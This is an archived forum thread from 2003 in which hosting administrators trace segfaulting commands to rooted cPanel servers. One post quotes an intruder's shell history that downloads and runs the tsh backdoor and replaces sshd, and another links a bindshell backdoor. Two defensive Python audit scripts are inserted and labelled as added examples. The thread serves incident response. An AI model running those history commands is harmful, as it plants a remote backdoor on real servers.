
Thread: ls segmentation fault

  1. #1
    Member
    Join Date
    Feb 2003
    Posts
    291

    ls segmentation fault

    Hello All,

    I get "Segmentation Fault (Core Dumped)" when I execute the "ls" command.
    I re-installed fileutils from the panel and it Installed fileutils-4.1-10.1.

    Then ls worked for me but after sometime it again fired the same error.

    When I again re-installed fileutils it works for some time, let's say 5 to 7 attempts, i.e. I can execute ls 5 to 7 times and it works, but then the same problem again.

    This has been a repeating problem for me. Any help would be appreciated.

    Help me, please.

    Thank you in advance.

    I am on Redhat 7.3 and WHM/cPanel 6.0

    Regards,

    Mitul

  2. #2
    Member
    Join Date
    Feb 2003
    Posts
    110

    Default

    I got the same problem. Anyone got a fix?

  3. #3
    Member
    Join Date
    Jan 2003
    Location
    India
    Posts
    343

    HMMmmmm... Serious

    Hello,

    This is a very serious problem!!! It simply means that your server has been compromised somehow. (I may be wrong!!!) But I am 90% sure it has been compromised.

    Get chkrootkit and see the results (be careful if it says 'bindshell: INFECTED', but don't worry).

    Check the port and the service running on that port (it might be portmap or portsentry). If the only output from chkrootkit is 'bindshell: infected' then you might be safe.

    Check the whole server thoroughly!!!!

    Be careful !!!!

    Regards,

    rh_linuxion

    It is very simple to be Happy but it is very difficult to be Simple.

  4. #4
    Member
    Join Date
    Mar 2002
    Location
    Alberta, Canada
    Posts
    1,509

    Default

    I would suggest you take the Server offline -- now.

    I, too, strongly believe your server has been cracked. You can further verify by running 'netstat' -- if it is not found or also does a 'core dump', it's safe to say you have been hacked. The "Core Dump" msg. will appear on a regular basis for certain commands, like netstat, ps, top, df. Crackers use these commands to remove traces of what they have been doing, although they know the command to prevent it, because they've set it up that way.

    It's a bummer and a big PITA, but there is no way of being absolutely sure all traces have been removed until the hard drive is re-formatted or looked at by someone experienced in this area. Every day you wait, you are giving someone else access to your server to do... who knows what.


    Just noticed the date of the first post.
    Although this information is probably no good to them now, hopefully it will help others in the future -- whenever they see that dreaded msg: Core Dump, and wonder what it means.
    Last edited by Website Rob; 04-18-2003 at 01:38 AM.
    Helping people Host, Create, and Maintain their Web Site
    Also providing Server Admin Services - setup / troubleshooting

    http://potentproducts.com/

  5. #5
    Member
    Join Date
    Feb 2003
    Posts
    110

    Default

    Yeah, I was hacked. I'm beginning to hate cPanel. Nothing but exploits and issues.

    And yeah, I was totally up to date on all software.

  6. #6
    Member
    Join Date
    Jan 2003
    Location
    India
    Posts
    343

    What exploited you???

    Hello,

    How did you come to know that you are hacked? Is it a rootkit??

    Check this out??
    http://www.soohrt.org
    Maybe it will help you!!!

    Let me know if you have any major problems; maybe I can help out!!!!

    (I had been a victim)

    Regards,
    rh_linuxion

    It is very simple to be Happy but it is very difficult to be Simple.

  7. #7
    Member
    Join Date
    Mar 2003
    Posts
    862

    Default

    Well, I get core dump messages usually after the completion of /scripts/easyapache/ unless I restart Apache with /etc/rc.d/init.d/httpd restart. I suspect that is because the final part of the installation attempts to restart Apache but that doesn't work properly, so unless you start Apache manually immediately after the rebuild you will see segmentation and core dump error msgs. Pages of it. But I do not get these msgs with ls, top, netstat etc.

    [Mon Apr 14 03:43:38 2003] [notice] child pid 10154 exit signal Segmentation fault (11)
    [Mon Apr 14 03:43:39 2003] [notice] child pid 20098 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:39 2003] [notice] child pid 10155 exit signal Segmentation fault (11)
    [Mon Apr 14 03:43:40 2003] [notice] child pid 20233 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:40 2003] [notice] child pid 20232 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:42 2003] [notice] child pid 20374 exit signal Segmentation fault (11), possible coredump in /usr/local/ap$
    [Mon Apr 14 03:43:42 2003] [notice] child pid 26474 exit signal Segmentation fault (11)

  8. #8
    Member (account confirmed by cPanel staff to represent a vendor)
    Join Date
    Feb 2002
    Posts
    2,075

    Default

    Originally posted by infinityws
    Yeah, I was hacked. I'm beginning to hate cPanel. Nothing but exploits and issues.

    And yeah, I was totally up to date on all software.

    Were you providing a cPanel demo on your site? If yes, it was BAD..
    Were you providing SSH? If yes, it was BAD..
    Was php safe mode off? If yes, it was BAD..

  9. #9
    Member
    Join Date
    Feb 2003
    Posts
    110

    Default

    Originally posted by Radio_Head
    Were you providing a cPanel demo on your site? If yes, it was BAD..
    Were you providing SSH? If yes, it was BAD..
    Was php safe mode off? If yes, it was BAD..

    No demo.
    SSH was activated on some accounts.
    Whatever the default is for php safe mode, that is what it is set to.

    Anyhow, the only accounts on the site were mine, with a few having SSH access.

  10. #10
    rnh
    Member
    Join Date
    Apr 2003
    Posts
    118

    Default

    Originally posted by infinityws
    Anyhow, the only accounts on the site were mine, with a few having SSH access.

    As long as you have secure passwords (i.e. "E5d982kjhsGkjh9" as opposed to "password") the SSH shouldn't be a problem, since you're the only person with access to the server.

    However, there are a few PHP scripts out there that have had vulnerabilities over the years, so if you're using some outdated PHP scripts of some sort that could cause problems, especially if you have php safe mode off (cPanel's default).

    If you don't know how they got in, you might want to do a grep through the PHP files for functions like "readfile", "passthrough", "fopen", "fwrite" and "fread", and other functions like that that could be used to access other files on your server, if you do not know all of the PHP scripts that you have installed.

    CGI files have been used to exploit servers as well, with scripts that did not check user input and wrote to files; the user's input was changed to use the CGI files to write to passwd files to change passwords, add users and other things like that that they can do to gain access.

    Also, did you have Anonymous FTP enabled?

    Otherwise it was probably just a vulnerability in some program, but cPanel seems to keep pretty up2date on patches and whatnot, so I can't imagine that cPanel servers get r00ted that often on common software vulnerabilities.
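A small audit for the PHP grep described in the post above, written as an added example and not the poster's own command: it reports calls to the listed file functions (plus passthru, which is PHP's actual spelling of the function) in .php files, skips // and # comments, and marks lines where request data ($_GET, $_POST, $_REQUEST, $HTTP_GET_VARS and friends) appears on the same line. The function list, the sample script and the same-line taint heuristic are assumptions made for this example.

```python
import os
import re

# Functions named in the post, plus passthru (PHP's actual name);
# the list is an assumption and can be extended.
RISKY_FUNCS = ("readfile", "passthru", "fopen", "fwrite", "fread")
CALL_RX = re.compile(r"\b(" + "|".join(RISKY_FUNCS) + r")\s*\(", re.IGNORECASE)
# Request-derived variables of the PHP 4 era; checked on the same line only.
TAINT_RX = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b|\$HTTP_(GET|POST|COOKIE)_VARS\b")

def audit_php_source(src, path="<string>"):
    """Return (path, lineno, function, tainted) for each risky call.
    Text after // or # is dropped as a comment (crude: also trims '#' inside strings)."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        code = line.split("//", 1)[0].split("#", 1)[0]
        for m in CALL_RX.finditer(code):
            hits.append((path, lineno, m.group(1).lower(), bool(TAINT_RX.search(code))))
    return hits

def audit_tree(root):
    """Walk a document root and audit every PHP source file found under it."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".php3", ".inc")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits.extend(audit_php_source(fh.read(), path))
    return hits

# Constructed sample script for demonstration (not from the thread).
SAMPLE_PHP = r"""<?php
// readfile($old);  commented out, ignored by the audit
readfile("/var/www/pages/" . $_GET['page']);   // request data reaches readfile
$fh = fopen("/tmp/app.log", "a");
fwrite($fh, "hit\n");
?>"""

if __name__ == "__main__":
    for path, lineno, func, tainted in audit_php_source(SAMPLE_PHP, "sample.php"):
        flag = "TAINTED" if tainted else "review"
        print(f"{path}:{lineno}: {func}() [{flag}]")
```

Run audit_tree("/home") on a server to cover every account's web root; a tainted hit is a line to read first, an untainted one still needs a look at where its arguments come from.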

  11. #11
    Member
    Join Date
    Feb 2003
    Posts
    110

    Default

    Well, about 2 weeks before today I went through all accounts and turned off anonymous FTP, as no one needed it.

    But I believe they got in through the ptrace exploit. Apparently, the .20 kernel upgrade doesn't give you any info as to whether the other patches were applied, so I had no idea. But I learn from my mistakes and I'll be sure to triple check that all patches have been installed.

    But I've read of many cPanel exploits; it's just my first time with a server using cPanel, and in less than a month it's been compromised. Never happened before.

  12. #12
    Member
    Join Date
    Oct 2002
    Posts
    47

    Default

    We had 7 of our cPanel boxes exploited this week; apparently they used a remote Unix shell backdoor like this one:

    http://packetstormsecurity.nl/groups...bindshell-unix

  13. #13
    rnh
    Member
    Join Date
    Apr 2003
    Posts
    118

    Default

    Man... sorry to hear about your misfortune.

    Was this done from a remote server and not by SSH enabled users on your own server?

    Man, glad I switched to FreeBSD... at least for now I am...

    What version of Linux were you running? Was it up to date?
    Last edited by rnh; 04-19-2003 at 03:04 PM.

  14. #14
    rnh
    Member
    Join Date
    Apr 2003
    Posts
    118

    Default

    I take that back... looking at that file again, the person has to have SSH access initially in order to execute that file, which opens port 60000 for them to access with elevated privileges...

    Did the script bypass a firewall closing off all unused ports or did you not have a firewall?

  15. #15
    Member
    Join Date
    Oct 2002
    Posts
    47

    Default

    It probably was a local user, and it's been a nightmare for the past week trying to clean this mofo out. Here's some of what he did, from .bash_history, once he rooted us:

    941 wget ftp://rt.fm/pub/OpenBSD/OpenSSH/port...3.6.1p1.tar.gz
    942 tar zxvf openssh-3.6.1p1.tar.gz
    943 cd openssh-3.6.1p1
    944 ls
    945 ./configure --prefix=/usr --sysconfdir=/etc/ssh/ --with-tcp-wrappers
    946 make
    947 ls
    948 rm /usr/sbin/sshd
    949 make install
    950 cd ..
    951 ls
    952 wget http://www.cr0.net:8040/code/network/tsh-0.52.tar.gz
    953 wget http://www.cr0.net:8040/code/network/tsh-0.42.tar.gz
    954 ls
    955 rm tsh-0.52.tar.gz
    956 tar zxvf tsh-0.42.tar.gz
    957 cd tsh-0.42
    958 ls
    959 make linux
    960 ls
    961 ./tshd

    This is what happened last night; previously in the week we thought we had him taken care of. We blocked his subnet at our router, we removed his Ambient's rootkit (ARK), removed his /home/user accounts and his entries in /etc/passwd, /etc/shadow, and /etc/group. Following that we edited /etc/passwd and switched everyone on all of our servers from /bin/bash to /usr/local/cpanel/bin/jailshell, and we removed all of the /root/.ssh keys as well. Apparently we didn't clean him out completely.

    All of the servers which were hacked were running the latest build of cPanel; they were all completely up2date, running Redhat 8.0 with the latest stable kernel 2.4.18-27.8.0.

    *sigh*
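A defender-side triage of a shell history like the one in the post above, as an added example that is not part of the original thread: it parses numbered .bash_history lines and flags the actions the excerpt shows (fetching a tarball, deleting /usr/sbin/sshd, building with --prefix=/usr, running an unknown daemon from the current directory). The sample history (with placeholder hosts) and the rule patterns are constructed for this example.

```python
import re

# Constructed sample modelled on the history excerpt in the post
# (download hosts replaced with placeholders, a benign command added at the end).
SAMPLE_HISTORY = """\
941 wget ftp://mirror.example.invalid/pub/openssh-3.6.1p1.tar.gz
942 tar zxvf openssh-3.6.1p1.tar.gz
945 ./configure --prefix=/usr --sysconfdir=/etc/ssh/ --with-tcp-wrappers
948 rm /usr/sbin/sshd
949 make install
952 wget http://files.example.invalid/tsh-0.42.tar.gz
959 make linux
961 ./tshd
962 ls -la
"""

# Assumed triage rules: (label, regex). Each encodes one step seen in the post.
RULES = [
    ("fetches remote archive", re.compile(r"\b(wget|curl|ftp)\b.*\.(tar\.gz|tgz|tar|zip)\b")),
    ("removes system binary", re.compile(r"\brm\b.*\s/(usr/)?s?bin/\S+")),
    ("builds into system prefix", re.compile(r"--prefix=/usr\b")),
    ("installs into system paths", re.compile(r"\bmake\s+install\b")),
    ("runs daemon from current dir", re.compile(r"^\./\S*d(\s|$)")),
]

def parse_history(text):
    """Split history lines into (number, command); the leading number is optional."""
    entries = []
    for line in text.splitlines():
        m = re.match(r"\s*(\d+)?\s*(.*\S)", line)
        if m:
            num = int(m.group(1)) if m.group(1) else None
            entries.append((num, m.group(2)))
    return entries

def triage(text):
    """Return (number, command, label) for every entry that matches a rule."""
    findings = []
    for num, cmd in parse_history(text):
        for label, rx in RULES:
            if rx.search(cmd):
                findings.append((num, cmd, label))
    return findings

if __name__ == "__main__":
    for num, cmd, label in triage(SAMPLE_HISTORY):
        print(f"{num:>5}  {label:<30} {cmd}")
```

Feed it the real file with triage(open("/root/.bash_history").read()) on a copy of the disk; an intruder who clears the history leaves nothing to parse, so an empty result is not a clean bill of health.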
